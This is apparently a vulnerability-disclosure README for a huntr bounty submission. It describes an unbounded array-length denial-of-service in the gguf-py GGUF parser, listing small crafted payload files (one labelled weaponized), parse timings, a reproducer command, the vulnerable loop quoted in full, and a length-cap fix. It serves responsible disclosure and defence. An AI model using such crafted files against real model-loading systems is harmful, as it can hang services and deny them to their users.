GGUF MFV: Unbounded array-length DoS in gguf-py Python parser
huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).
This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).
Bug class
CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).
gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. No upper cap, no file-size consistency check. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) DOES enforce GGUF_MAX_ARRAY_ELEMENTS = 1GB โ that protection was not propagated to the Python parser.
Payloads in this repo
| File | Size | Declared alen |
Observed parse time (Python 3.13) |
|---|---|---|---|
array_len_10000.gguf |
56 bytes | 10,000 | 0.05s |
array_len_100000.gguf |
56 bytes | 100,000 | 0.42s |
array_len_1000000.gguf |
56 bytes | 1,000,000 | 9.15s |
malicious_array_len.gguf |
56 bytes | weaponized value | parser hangs effectively forever |
kv_count_10000.gguf |
47 bytes | 10,000 (kv_count branch) | sibling primitive |
kv_count_100000.gguf |
47 bytes | 100,000 (kv_count branch) | sibling primitive |
kv_count_1000000.gguf |
47 bytes | 1,000,000 (kv_count branch) | sibling primitive |
Linear scaling at ~10 us/iter. Extrapolation:
alen |
Parse time |
|---|---|
| 10^7 | ~91 s |
| 10^8 | ~15 min |
| 10^9 (matches the C++ sibling cap) | ~2.5 hours |
| 10^12 | ~110 days |
| 2^64 - 1 (UINT64 max) | ~5.8 million years |
Reproducer
pip install gguf
python poc_gguf_py_array_length_dos.py
The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.
Sink (verbatim)
llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:
if gtype == GGUFValueType.ARRAY:
raw_itype = self._get(offs, np.uint32)
offs += int(raw_itype.nbytes)
alen = self._get(offs, np.uint64) # attacker-controlled length
offs += int(alen.nbytes)
aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
data_idxs: list[int] = []
for idx in range(alen[0]): # unbounded iteration
curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
if idx == 0:
types += curr_types
idxs_offs = len(aparts)
aparts += curr_parts # list growth per iter
data_idxs += (idx + idxs_offs for idx in curr_idxs)
offs += curr_size
return offs - orig_offs, aparts, data_idxs, types
Suggested fix
Mirror the C++ cap:
GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024 # 1 GiB element cap
GGUF_MAX_STRING_LENGTH = 1024 * 1024 * 1024 # 1 GiB string cap
if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")
Same protections needed for tensor_count and kv_count reads at line 165.
Disclosure status
Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. Sibling-class to this researcher's prior 6 MFV memory-amplification findings on npy / npz / messagepack / pickle / parquet / onnx (May 2026), same primitive class.
The maintainer ggml-org/llama.cpp is being notified through the huntr disclosure flow.
- Downloads last month
- 2
We're not able to determine the quantization variants.